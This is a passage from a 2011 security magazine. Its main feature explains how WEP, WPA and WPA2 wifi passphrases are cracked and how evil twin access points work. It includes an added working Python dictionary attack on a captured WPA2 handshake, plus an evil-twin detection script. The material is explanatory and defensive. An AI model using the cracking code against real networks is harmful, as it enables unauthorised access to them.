
FEATURE

14
Network Security November 2011
Especially in large corporations, it is highly unlikely that an administrator can say, with absolute certainty and for all members of staff, which applications are legitimate or even business-critical for which employee. A responsible, restricted use of social media and private websites is the ideal today. Putting it bluntly, one administrator even said: "I'll start blocking arbitrary applications when I want to lose my job." With new options available to them, administrators can closely observe and optimise the network traffic. The following regulations are conceivable:
• Access to job portals is only granted to the HR department.
• Private Internet surfing is allowed outside core working hours and in the lunch break.
• Sales and marketing are given unrestricted access to Facebook and other social networks.
If clear internal guidelines exist and state that, for example, Skype may not be used, then the most successful option is often not to block these applications but to throttle them. Limited to less than 10 Kb/s of bandwidth they become unbearably slow, users are practically paralysed, and they restrict their usage voluntarily. Otherwise the focus should be placed on the high availability of business-critical applications, for example the Enterprise Resource Planning (ERP) system. These should be given high priority and perhaps routed from the outset over better and more reliable connections. This kind of WAN optimisation gains new importance with the cloud computing trend. What is the point in renting high-performance cloud resources or Software as a Service (SaaS) if access to them is slowed down by YouTube videos and Facebook updates?
About the author
Dr Klaus Gheri is VP product management Europe at Barracuda Networks. Prior to the acquisition of Austria-based Phion AG by Barracuda Networks in late 2009, he served as Phion's co-founder and CTO, responsible for product and technology strategy as well as strategic business relationships. After an international research career in quantum communication he left academia to start Phion. Gheri has been a key player in the architectural design and development of the Barracuda NG Firewall (formerly Phion Netfence enterprise firewall) product line. He has more than 10 years of experience working in the security arena and has spoken at many security events worldwide, including Infosecurity Europe. Gheri holds a PhD in theoretical physics from the University of Auckland, New Zealand.
Figure 3: Next-generation firewall management with application and user detection.
Cracking wireless networks
Steve Gold, freelance journalist

The security of wifi connections has been in and out of the news over the past few years as the integrity of the wifi encryption process has been progressively eroded. Wifi encryption is normally driven by the use of three flavours of passwords/passphrases, Wired Equivalent Privacy (WEP), Wifi Protected Access (WPA) and WPA2, which use different methodologies to ensure (to differing degrees) the integrity of the wifi IP-based communications path. But all have come under attack, with tools available to intercept and crack authentication. Does this mean that wifi should now be considered insecure?

Integrity in question
WEP's cryptographic weaknesses had been published by 2001 (see Resources), but it was in 2004 that the integrity of the WEP password system was called into question in practice, after the Aircrack wifi password-cracking suite was released. The open source suite, now known as Aircrack-ng and updated to perform attacks on the WPA/WPA2 wifi password systems, consisted of a number of wireless auditing utilities:
• Airodump, an 802.11 packet capture program.
• Aireplay, an 802.11 packet injection program.
• Aircrack, a static WEP and WPA-PSK key cracker.
• Airdecap, which decrypts WEP/WPA capture files.
Because the amount of time it takes to hack an encrypted wireless network depends on the amount of traffic that the cracking software has access to, the second module of Aircrack, Aireplay, is viewed as the most useful program of the four, as it allows the wireless hacker to increase the network traffic and so speed up the hacking process.
The third and fourth elements of the suite, Aircrack and Airdecap, were (and still are) useful to crackers because they work for both WEP and WPA encryption, although back in 2004 the processing power available made the cracking of a WPA password a lengthy process, normally taking several weeks even where multi-core processing power was used. This contrasted with a typical cracking time for WEP (in 2004) of 20 minutes or so, a time-frame that has since been reduced to around 30 seconds using commercial software from Elcomsoft and others, as well as open source/freeware suites such as Aircrack.
The revelations about WEP insecurity meant that, since 2005, most experts have advised against the use of WEP-based password security except where absolutely necessary, although, interestingly enough, many wireless audio streaming systems, notably Logitech's Squeezeserver and Squeezebox series, advise the use of WEP owing to its low overhead in terms of data bandwidth used.
Cracking WPA
It took until December 2009 before leading security researcher Moxie Marlinspike, who has since gone on to develop a number of smartphone and tablet computing crypto applications for the Android platform, launched the WPAcracker.com website.[1] Using a parallel processing set of servers, Marlinspike claimed that his systems could crack vulnerable WPA passwords (those that appear in its dictionary) in around 20 minutes, a process that would have taken a dual-core PC around 120 hours using suitable software at the time. The cloud-based service, which costs $17.00 a time, reportedly uses a 400-node cluster of computers to run through a dictionary of around 130 million WPA passphrase candidates in 20 minutes.
To use the service, Internet users upload a copy of the four-way handshake that occurs when a wifi device starts negotiating a link with a wifi access point, captured off-air using Aircrack's Airodump module or an open source utility such as Wireshark. Although Wireshark is generally best known as a packet sniffer and analyser, widely used for network troubleshooting, analysis, and software and communications protocol development, its considerable evolution since it was first launched as Ethereal makes it a popular wifi analysis tool.
The evolution of WPAcracker.com was notable in wireless cracking terms as, according to Marlinspike, although rainbow tables can be used to speed up a brute-force attack on a WPA password, the process is truly brute force in nature because each cracking project is unique. As Marlinspike observes: "You have to build a unique set of rainbow tables for each network that you would potentially like to audit."
A rainbow table is essentially a precomputed table for reversing cryptographic hash functions, typically used for cracking password hashes. Tables are usually used for recovering a plain-text password up to a certain length consisting of a limited set of characters. They are of little use against WPA because the key derivation salts the passphrase with the network's SSID, so a table is only valid for the one SSID it was built for.
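What "unique per network" means in practice, as an added example that is not code from the article, from Aircrack-ng or from WPAcracker.com: the script derives the pairwise master key the way 802.11i specifies it (PBKDF2-HMAC-SHA1 with the SSID as the salt), has a pretend station sign a constructed EAPOL-Key message 2 the way a legitimate supplicant would, and then runs the attacker's dictionary loop against that capture. The SSID, passphrase, MAC addresses, nonces, key data and wordlist are all made up so that it runs offline; the only real-world value is the 802.11i test vector quoted in the comment.

```python
"""WPA/WPA2-PSK offline dictionary attack against a captured four-way handshake.

Added example, not code from the article, Aircrack-ng or WPAcracker.com.
Everything here (SSID, passphrase, MACs, nonces, EAPOL frame, wordlist) is
constructed so the script runs offline and shows why the SSID acts as a salt.
"""
import hashlib
import hmac

MIC_OFFSET = 81  # offset of the 16-byte MIC field inside an EAPOL-Key frame (4-byte EAPOL header + 77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).

    802.11i Annex H test vector: passphrase 'password', SSID 'IEEE' gives
    f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e.
    """
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(PMK, label || 0x00 || data || i) for i = 0..3, keep 64 bytes."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def build_eapol_msg2(snonce: bytes, key_data: bytes) -> bytes:
    """Constructed EAPOL-Key message 2 (station to AP) with the MIC field still zero."""
    key_info = (0x010A).to_bytes(2, "big")                      # descriptor v2 (HMAC-SHA1), Pairwise, MIC bit
    body = (b"\x02" + key_info + bytes(2) + (1).to_bytes(8, "big")  # RSN descriptor, key info, key length, replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)             # SNonce, key IV, RSC, key ID
            + bytes(16) + len(key_data).to_bytes(2, "big") + key_data)  # MIC (zeroed), key data length, key data (RSN IE)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body    # EAPOL version 2, type EAPOL-Key


def compute_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 (CCMP) MIC: HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def supplicant_sign(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, frame):
    """What the legitimate station does: KCK is the first 16 bytes of the PTK; fill in the MIC."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return frame[:MIC_OFFSET] + compute_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack(capture: dict, ssid: str, wordlist):
    """Attacker side: recompute the MIC for every candidate. The 4096 PBKDF2 rounds per guess are the cost."""
    target_mic = capture["msg2"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), capture["ap_mac"], capture["sta_mac"],
                           capture["anonce"], capture["snonce"])[:16]
        if hmac.compare_digest(compute_mic(kck, capture["msg2"]), target_mic):
            return candidate
    return None


def demo():
    """Constructed network and handshake (assumptions, not captured data)."""
    ssid, secret = "CorpGuest", "sunshine2011"
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    msg2 = supplicant_sign(secret, ssid, ap_mac, sta_mac, anonce, snonce,
                           build_eapol_msg2(snonce, b"\x30\x02\x01\x00"))
    capture = {"ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "snonce": snonce, "msg2": msg2}
    wordlist = ["password", "letmein", "sunshine2011", "qwerty123"]
    # Same capture, same wordlist: only the SSID used as salt differs in the second call.
    return crack(capture, ssid, wordlist), crack(capture, "OtherSSID", wordlist)


if __name__ == "__main__":
    found, wrong_ssid = demo()
    print("recovered:", found, "| same capture cracked with the wrong SSID:", wrong_ssid)
```

Two things the code makes visible that the prose does not. First, nothing in the capture is the passphrase; what the attacker holds is the MIC on message 2 plus the two nonces and MAC addresses, and each guess costs a full PBKDF2 derivation (4096 HMAC-SHA1 rounds) before the cheap PRF and MIC steps, which is exactly what a "passphrases per second" benchmark measures. Second, the SSID enters the derivation as the salt, so precomputed tables, Marlinspike's or anyone else's, have to be built per SSID, and the same capture fails to crack the moment the wrong SSID is supplied.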
Marlinspike's WPAcracker.com site, though ground-breaking at the time, has been superseded by a number of other WPA cracking developments, most notably Elcomsoft's aptly-named Wireless Security Auditor (WSA), which is available in standard and professional versions. Like many of the Russian-based password recovery specialist's applications, WSA is designed to harness the complete processing power of a host computer, including tapping the power of PC graphics cards, to run an intelligent brute-force attack on a password system, in this case WPA/WPA2 passphrases.
Elcomsoft's WSA is also notable as there is a trial version available from the company's website that, like the paid-for editions, supports dictionary attacks with an advanced variation facility and works from standard tcpdump capture files. Put simply, the software allows even novices to crack WPA and WPA2 passphrases intelligently. Ironically, cracked versions of WSA are widely available on various pirate and warez forums, although many versions of the cracked software are infected with malware.
Moxie Marlinspike.
Wireless Security Auditor from Elcomsoft.
The development of WPAcracker.com and Elcomsoft WSA does not mean that all WPA passphrases are crackable as, generally speaking, the longer and less predictable a passphrase is, the more difficult (in terms of the time taken) it is to crack. WPA's great strength over WEP is that it introduced the Temporal Key Integrity Protocol (TKIP), which replaces WEP's static 40-bit or 104-bit key (marketed as 64-bit and 128-bit) with a 128-bit per-packet key and adds a message integrity check; WPA2 goes further and replaces TKIP with AES-based CCMP. Note that this per-packet keying protects the traffic, not the passphrase: all of the tools above attack the passphrase offline from a captured handshake, and no amount of per-packet keying helps a passphrase that appears in a dictionary.
How easy is it to crack a WPA2 passphrase?
Until September 2010, when Elcomsoft released a major upgrade to its WSA software, most experts advised that WPA2 was a sufficiently strong password system to be uncrackable in practice. All of that changed when WSA was refreshed with enhanced WPA2 brute-force cracking, which means that, with the professional version, crackers can use a computer with up to 32 CPUs and 8 GPUs to attack wifi passphrases by brute force. Review tests of Elcomsoft's WSA software have shown the application can test as many as 103,000 WPA2 passphrase candidates per second, which equates to more than six million a minute, on a PC equipped with an HD5390 graphics card.
According to Peter Wood, CEO of pen-testing specialist First Base Technologies, Elcomsoft's software essentially means that the integrity of a wifi connection cannot be trusted and, while he recommends WPA2 passphrases of 20 characters or more for a domestic wifi environment, he advises against the use of wifi in a business setting. If a wireline connection is not available, as is the case in many offices, then he recommends the use of 20+ character WPA2 passphrases (with mixed upper and lower case characters) and a Radius-based VPN system to adopt a belt-and-braces approach to wireless security.
Wood, who is also a member of the ISACA Security Advisory Group, says: "The problem with most business wifi deployments is that admins use passphrases that are a lot shorter than 20 characters, even though a 20 character, or more, passphrase can be a simple phrase that means something to the user, for example, OurProductsAreBetterThanThoseFromACMELimited or something similar."
This, he says, would be almost impossible for a cracker to guess.
Private Wifi by Private Communications Corp.
Peter Wood, First Base Technologies.
Say hello to the evil twin
Wood also cautions against complacency, even if an organisation uses a 20-plus character WPA2 passphrase, as hackers have been spotted using a technique known as an evil twin wifi access point attack for several years. The evil twin hacking methodology involves setting up a rogue wifi access point with the same Service Set Identifier (SSID) as the adjacent legitimate station and waiting for users to log in automatically.
Hackers have modified the evil twin methodology for use on cellular networks. At the DefCon security conference in Las Vegas in August 2010, a rogue GSM base station was used to hoover up mobile phone identifiers: the International Mobile Subscriber Identity (IMSI) held on the SIM card inserted into the handset, and the International Mobile Equipment Identity (IMEI) of the device hardware.[2]
Unfortunately for the wifi industry and its users, wifi has no standards-based identifier that a client can use to authenticate the access point it is joining (the IMSI/IMEI identifiers seen on cellular networks name the subscriber and handset, and did not stop the DefCon rogue base station either). A wifi client knows an access point only by its SSID and by a BSSID that is simply a MAC address, and a rogue can copy both. This means that if a rogue wifi access point with the same SSID as a legitimate access point is located nearby, users' devices will typically log themselves into the evil twin station. As well as introducing all manner of IP and VoIP eavesdropping possibilities using a man-in-the-middle approach, the wifi evil twin also lets the hackers harvest the authentication handshake: for WEP, WPA and WPA2 networks, enough of it to attack the passphrase offline (the passphrase itself is never sent over the air), and on enterprise networks whose clients do not check the authentication server's certificate, the users' login credentials as well.
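The checks an administrator can run over a site survey to spot a twin, as an added example and not code from the article: it takes a scan of nearby access points and an inventory of the ones the organisation actually operates, and flags any record advertising a corporate SSID from an unknown BSSID, from a known BSSID on the wrong channel (a cloned BSSID), or with a different security setting (an open twin of a WPA2 network). The scan records and the inventory are constructed, and the five-field record layout is an assumption; a real scan from airodump-ng or similar carries more fields but the same information.

```python
"""Spotting an evil-twin access point in a wireless scan.

Added example, not code from the article. The scan records and the inventory of
approved access points are constructed; the record layout is an assumption.
"""

# Assumed inventory: SSID -> (expected security, {BSSID: expected channel})
APPROVED = {
    "CorpWifi": ("WPA2", {"00:11:22:33:44:01": 1, "00:11:22:33:44:02": 6}),
}

# Constructed scan: (BSSID, SSID, channel, security, signal in dBm)
SCAN = [
    ("00:11:22:33:44:01", "CorpWifi", 1, "WPA2", -55),    # legitimate
    ("00:11:22:33:44:02", "CorpWifi", 6, "WPA2", -70),    # legitimate
    ("a4:b1:c2:d3:e4:f5", "CorpWifi", 11, "OPN", -40),    # open twin: victims' traffic arrives in the clear
    ("a4:b1:c2:d3:e4:f6", "CorpWifi", 1, "WPA2", -38),    # WPA2 twin: collects the client half of the handshake
    ("00:11:22:33:44:01", "CorpWifi", 11, "OPN", -35),    # twin that also cloned a legitimate BSSID
    ("0c:0c:0c:0c:0c:0c", "CoffeeShop", 6, "OPN", -80),   # not one of ours; out of scope for this check
]


def find_evil_twins(scan, approved):
    """Return every scan record advertising one of our SSIDs that does not match the inventory.

    Three checks: unknown BSSID, known BSSID on the wrong channel (cloned BSSID),
    and a security profile that differs from what the inventory says.
    """
    findings = []
    for bssid, ssid, channel, security, signal in scan:
        if ssid not in approved:
            continue
        want_security, inventory = approved[ssid]
        reasons = []
        if bssid not in inventory:
            reasons.append("BSSID not in inventory")
        elif inventory[bssid] != channel:
            reasons.append(f"inventory BSSID on channel {channel}, expected {inventory[bssid]}")
        if security != want_security:
            reasons.append(f"advertises {security}, inventory says {want_security}")
        if reasons:
            findings.append({"bssid": bssid, "ssid": ssid, "channel": channel,
                             "signal": signal, "reasons": reasons})
    # Strongest signal first: that is the twin the victims' laptops are most likely to join.
    findings.sort(key=lambda f: f["signal"], reverse=True)
    return findings


if __name__ == "__main__":
    for f in find_evil_twins(SCAN, APPROVED):
        print(f"{f['bssid']} {f['ssid']} ch{f['channel']} {f['signal']} dBm: {'; '.join(f['reasons'])}")
```

The limit of this approach is the last row of the scan: a twin that clones the BSSID, channel and security of a legitimate access point is indistinguishable in scan data, which is the point Wood makes next. A scan can only detect the rogue after the fact; only the client, by authenticating the network (802.1X with the RADIUS server's certificate checked, or a VPN that will not come up without the right server), can refuse to join it.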
Wood says that is another reason why the security of wifi connections, if they must be used, needs to be augmented through the use of Radius or similar advanced authentication systems, but notes that the evil twin attack methodology is relatively simple in technological terms, yet reaps enormous benefits for cybercriminals.
Encrypted wifi made easy
While the underlying insecurity of wifi network standards, especially public access networks, is likely to be a thorn in the side of the IT industry for some time to come, a US-based company called Private Communications Corp (PCC) has a subscription security service that creates a 128-bit Secure Sockets Layer (SSL) VPN between the mobile computer (Windows XP, Vista or 7, or Apple Mac OS X 10.5 or later) and its servers. Called Private Wifi, the $9.95 a month ($89.95 a year) service transparently creates an encrypted tunnel between the wifi-enabled computer and the Sherman, Connecticut-based firm's servers and, according to Kent Lawson, PCC's CEO, uses a client application to encrypt all data going in and out of a computer across a wifi link into the Internet.[3]
Private Wifi, he says, activates automatically in the background of any computer, similar to how anti-virus and anti-malware applications operate. As well as encrypting the TCP/IP transmissions, Lawson explains that the secure connection also masks users' IP addresses, adding an extra layer of privacy.
If paying an ongoing subscription for encrypted wifi access is inappropriate, then another option may be to force an HTTPS connection. This won't solve the underlying security issues associated with wifi usage, but it will make the overlay web sessions more secure. HTTPS uses the SSL/TLS protocol to provide encrypted communications and server authentication across an underlying IP-based connection. While widely used for financial transactions, HTTPS adds handshake latency and CPU cost on the server, so at the time of writing many web hosts use it only when user credentials and allied private information are exchanged, leaving the rest of the session, including its cookies, in the clear.
In September 2010, the Electronic Frontier Foundation and the Tor Project (a web anonymity project team) teamed up to develop a Mozilla Firefox add-on that forces an HTTPS connection whenever the facility is available on a website being accessed. Known as HTTPS Everywhere, the Firefox add-on is free to download and use, and rewrites regular HTTP requests to HTTPS for the websites covered by its rule set. The rule set is configurable, meaning that users can modify its behaviour to meet their personal needs.
Finally, there are several wifi analysis and sniffer applications available for Android-based devices, though not generally on iOS, as Apple reportedly takes a dim view of these apps, reasoning that they can be used by hackers as well as network auditors. However, Apple has approved SubnetInsight from BluesWine.[4] This wifi analysis utility allows iPhone and iPad users to scan, audit and manage their wifi networks, as well as interrogating all the devices connected behind the router to see if anything unusual is going on.
About the author
Steve Gold has been a business journalist and technology writer for 26 years. A qualified accountant and former auditor, he has specialised in IT security, business matters, the Internet and communications for most of that time. He is technical editor of Infosecurity and lectures regularly on criminal psychology and cybercrime.
References
1. Kandek, Wolfgang. 'New cloud-based wireless password cracker'. Dark Reading, 9 Dec 2009. Accessed Nov 2011. <http://www.darkreading.com/blog/227700972/new-cloud-based-wireless-password-cracker.html>.
2. 'DefCon 2010 hack of cellular networks shows evil twin methodology'. Infosecurity, 6 Aug 2010. Accessed Nov 2011. <http://www.infosecurity-magazine.com/view/11564/defcon-2010-hack-of-cellular-networks-shows-evil-twin-methodology>.
3. Smollinger, Matt. 'Private Wifi Reviewed'. SmallCloudBuilder, 17 Mar 2011. Accessed Nov 2011. <http://www.smallcloudbuilder.com/apps/reviews/293-private-wifi-reviewed>.
4. 'SubnetInsight'. Apple iTunes. Accessed Nov 2011. <http://itunes.apple.com/us/app/subnetinsight-scan-manage/id385495647?mt=8>.

Resources
1. Arbaugh, William. 'An Inductive Chosen Plaintext Attack against WEP/WEP2'. University of Maryland, May 2001. Accessed Nov 2011. <http://www.cs.umd.edu/~waa/attack/v3dcmnt.htm>.
2. 'Wireless adoption leaps ahead, advanced encryption gains ground in the post-WEP era'. RSA, 14 Jun 2007. Accessed Nov 2011. <http://www.rsa.com/press_release.aspx?id=8451>.
3. 'How to: Aircrack-NG (Simple Guide)'. Ubuntu Forums. Accessed Nov 2011. <http://ubuntuforums.org/showthread.php?t=528276>.

Who's in control: a six-step strategy for secure IT
Stuart Facey, Bomgar

As more and more organisations encourage flexible and remote working policies that allow employees to work outside the office, the complexity surrounding remote access and support mechanisms for the IT helpdesk has also increased. There is a growing and unregulated market for solutions that can fix IT issues quickly and efficiently no matter where workers are located: however, as with many solutions, remote support and access products have their own inherent security risks that should not be underestimated.

Hackers are usually one step ahead of IT professionals, and they've been characteristically swift in taking advantage of insecure remote support technology products, many of which are like Swiss cheese: full of holes. Indeed, a report from Verizon that examined the attack pathways of more than 700 data breaches caused by hackers in recent times identified several areas of concern, of which the most significant came from remote control and remote access tools.
According to the report, as many as 71% of all hacking attacks are conducted through remote access and desktop services pathways, painting a worrying picture for CIOs, CSOs and IT helpdesk managers. In the face of such a threat to data security, IT professionals as well as end users need to ask tough questions about who is accessing their systems (and why), what exactly is being accessed, and what is happening with the information at their disposal.
One way IT can mitigate this threat is by adopting a secure, centralised remote support solution and then blocking network access for all other unapproved remote access and support software. The following six tips offer guidance for support organisations to ensure that their remote support solution offers the highest levels of security.

SaaS vs on-premise
Clearly, one of the most important factors in ensuring remote support security is identifying who is in control of the data. There are many choices of remote support technologies, but they mainly fall into two categories: Software as a Service (SaaS) and on-premise.
By design, any data that is accessed through a SaaS remote support tool is automatically passed through a third-party server, which means the third-party provider, or anyone who breaches that vendor, has the ability to access the data and in some cases credentials. That said, SaaS is a perfect option for many technologies and applications, as it offers a number of benefits. However, because remote support tools generally allow access into every employee's devices (desktops, laptops, mobile devices, etc) and a majority of company networked systems and servers, the obvious dangers of passing the data through a third party become clear. Essentially, when you put your remote support system in the cloud, you're agreeing to put all of your company's data and systems in the cloud.
With an on-premise model for remote support, all of the data accessed during a remote support session, along with a formal audit trail of the support representative's actions, remains behind the company's own firewall, keeping the company in control. This is clearly a significant benefit for companies that
